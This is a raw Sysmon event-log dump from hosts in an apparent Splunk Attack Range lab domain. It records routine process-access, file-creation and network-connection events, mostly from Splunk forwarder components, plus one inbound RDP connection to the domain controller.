4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.341{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.326{0C1E0330-F264-60EB-3379-00000000D001}416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000805798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.107{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77472AA1BA26B8C7BC0C28D97CDE40C6,SHA256=A494A5A8C8E3BB25ABD73CC65AD2DFA1FACEAACCDDCE5280DD05821BC7A77C41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:29.638{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E08A31266E0DC72D1251B166E6B4105,SHA256=B234B28D0154B21499A59E2ADC8D292A2E9B6241E0EFE7A08B02E0D5695CB208,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:29.394{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E364F158382A6C04C3D1F30BB9B27918,SHA256=4628254D374182D19DEF03062CF846D8CE4BB6E90F4F6B4D0F3231F55258E2D5,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000805815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:28.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57133-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:29.372{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1A42167B1ED28E7D060BCCEED1BB2D37,SHA256=5FEEDA971941CE546F980AAE85774E9D48B78D89A2633D8F2FFB6CECE6DD43A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:30.653{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9519A83D78096288710DD9A73A4A23D9,SHA256=C3E907491F127314BEEC03A0C5B9A615272331A8804E28A7A689617300E3D38C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:30.431{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67365BA9416A86532007F360710596F8,SHA256=34167DD7905ADF8C67BEB10332652C5E4433E5374977812AA560B15CFE48F66D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000805817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:30.044{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=829596DDDBC27ED4F24B2BFEEF61EAED,SHA256=606CC04E9FB34D0DA4FF68BF55D76FE50620BB129714C61B24C6F524D03D88BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:21.721{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50879-false10.0.1.12-8000- 23542300x8000000000000000805819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:31.685{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0A0988CC333073CCE48FBC68EC9AC45,SHA256=2354EBA5085C5940C4E358CCE37B7CA377331D9F22A19D5172ADA11BBE1E5AD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:31.445{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C67FF5AF8750403805B84DF90218B21,SHA256=1756651D2045306662A55356B5346A4C5A371D53F2B521A2903A5ADFD2A1DEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:42:32.685{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DA1D88C0B380D347DD181ECDA26352,SHA256=C5DA9ABD30F6144D3593B6525D562614B100DA9AF5665D6DBC8BA44CDACBD937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:32.460{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5BB7BA575C5C1C035D597DEAB369D25,SHA256=EDE6050EC3326B9991732C5CE2C7A6B194E615F3EF9D86FB04D093A7BDE8EF41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:33.697{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29833DA41FE7AD9F84F750425FF36EF2,SHA256=C5ED796942A6DEB12801F30D3A261BF2E7A1C72AB3CEE316BDFB6D74535D83B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:33.490{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95E623AC9BCA14A4610B2324AD9724F,SHA256=CC0207923E2BAAB360DECA2BBAD76308AEED0D84E4FAD08A8BA803F8288FC7DC,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000805823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:33.240{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57134-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:34.712{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F60D9CD8EFA03DC848625BDF4672E575,SHA256=2322CE2A4C2397E1E5CF977638A5FF6DB06CF7043A5E44313C35B69232F69CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:34.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C875EFA5D3BCDE5F1B7E808F33EFD57A,SHA256=94317C31F28E059D18C892ECEC4A37A25F319A0860BE2391E6937967DC2B4C15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:35.743{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E9428F1DACAE839338A22C452D928FF,SHA256=165F6A0B3755675E582C2A1C6651060A629543198EE823C4D497F8BA5BE2CE25,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001045522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:35.526{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F785C4127BB8DFDD3DF37C15D698260D,SHA256=68466A0950CC08E3133B3955961F1834BCE0FA2B3526ABAC1639E4C33267B83D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:36.768{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A98AA6A3D498B79E23C28FEBB8AB83C3,SHA256=BFB61FA675B5A93BA9F236045BB631170A5528DBE4DBA617B6E33AA0974B02FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:36.557{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C256556DA80A205B860F3E5BFE5EA35D,SHA256=AE9BAB2012C896683C04B0A05D6FA48B92C93CF77A30911BA9EB9717363A3A20,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:27.747{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50880-false10.0.1.12-8000- 
23542300x8000000000000000805826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:37.780{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2E39FA31DD8672065FECCEDD9AE4038,SHA256=B79C1EA819FDCE4B31F674D334C342B543A949BF09847D3A868311BEBBF217A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:37.558{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=047244EB6C7B8096175952781769B100,SHA256=917D94EEAE42548D8595EAE4EDD08E00C1AD59118A387E444560B284EF201402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:38.814{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DE941FCD950857FBC354E2CD799FF66,SHA256=EEF46054DBBEE29688A56EF75BAEC17642937AEE64A153602F59E47D9C0D9584,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:38.589{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C10373EB5C3A1E4441DD1F5517E0BBEC,SHA256=EEC78772466A94CD78E4C4942B90FFE85B37BE6D3E7551813C3CBA65C1DEDCBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:38.427{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5B11AAFF0C00D359A109141237949D39,SHA256=DCBAB330D956F0A9E4B8E3D5BF8697D63907D2834C335D3A2DDFD729D26F581C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:39.814{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B053D010ECA8EE8107DAA39E7FD4D111,SHA256=9B83A01A8A89D587F81667BACCDAE2DA93DDCE10C305521C5535D364944B2E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:39.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA6DC2AB622804D74D420099E8E61EAE,SHA256=044C4486C615D112062DA80789FCE1C433123C5173EDB0C7F5CA9A0ADAF3FF74,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:39.228{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57135-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:40.845{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50E9D1919F7B2B14ACFF01E4D3A582ED,SHA256=2E65CD0D37F6DE099ACEF434EA4EB329327568ED0809696C5CF3DAACB39F5A7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:40.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A29E1ACA6986D3319AE63801948DA467,SHA256=82031B55A4A982E6CDD35890B0FB53A379D88ACC9136CAAD77340297795C61C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:32.482{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net28601-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000805831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:41.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81FFB0740BFA5B1393AC106762DDE305,SHA256=81A573CCCDC76BD2F29EC11EC6E0258E4AFCE9B41C7DF7F86FC4EE68643393E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:41.686{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C8EA121C409BA7BC808890B95BF32AD,SHA256=2E7471FBCEFBC165443F734C0CB5503BF5B5DE95C78CBB9F55E101C7E871DBC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:41.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 